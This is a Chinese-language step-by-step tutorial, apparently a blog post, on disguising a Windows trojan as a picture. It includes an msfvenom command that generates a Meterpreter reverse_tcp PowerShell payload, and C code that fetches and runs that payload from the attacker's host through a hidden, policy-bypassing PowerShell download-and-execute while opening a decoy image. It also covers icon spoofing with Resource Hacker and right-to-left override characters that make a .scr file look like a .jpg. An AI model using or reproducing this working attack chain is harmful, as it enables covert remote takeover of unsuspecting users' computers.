能夠將可執行文件偽裝成圖片
用到的工具: kali 2.0、msfasploit、Resource Hacker
首先利用msfvenom生成一個powershell的ps1文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.149.129 lport=2234 -f psh-reflection>/var/www/html/payload.ps1
隨后開啟apache服務
service apache2 start
然后找兩張png和ico一模一樣的圖片
一樣放到apache目錄下
接下來在windows系統上編譯如下代碼
#include <stdio.h> #include <windows.h> int main() { system("powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.149.129/shot.png', 'C:\\Users\\Public\\shot.png') & start C:\\Users\\Public\\shot.png & powershell.exe -windowstyle hidden -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.149.129/payload.ps1');test.ps1\""); return 0; }
這串代碼會遠程下載shot.png,並保持在本地。然后馬上打開它!!
這時候,把編譯好的惡意程序的圖標改成shot.png一樣的圖片就可以偽裝成一張圖了。這時候你打開不僅僅會打開本地下載好的圖片,而且還會執行我們的payload.ps1
下面就說如何更改圖標
下載一個Resource Hacker
open一個可執行文件--》Add Binary--》添加完圖標后保存
然后就在桌面上出現一個demon.exe
這時候還沒完,我們把他改成“gpj.scr”格式
不用擔心改成scr格式文件就無法運行了
接下來我們利用系統專有的從右至左 (Right-to-Left) 的字符重寫 (RLO)控制字符來達到迷惑的效果
先改成gpj.scr 然后吧光標放在gpj的前面,再右鍵改字符
我們來試試效果:
配置好msf反彈
可以看到,運行rcs.jpg之后,直接打開了圖片並且msf彈回了shell。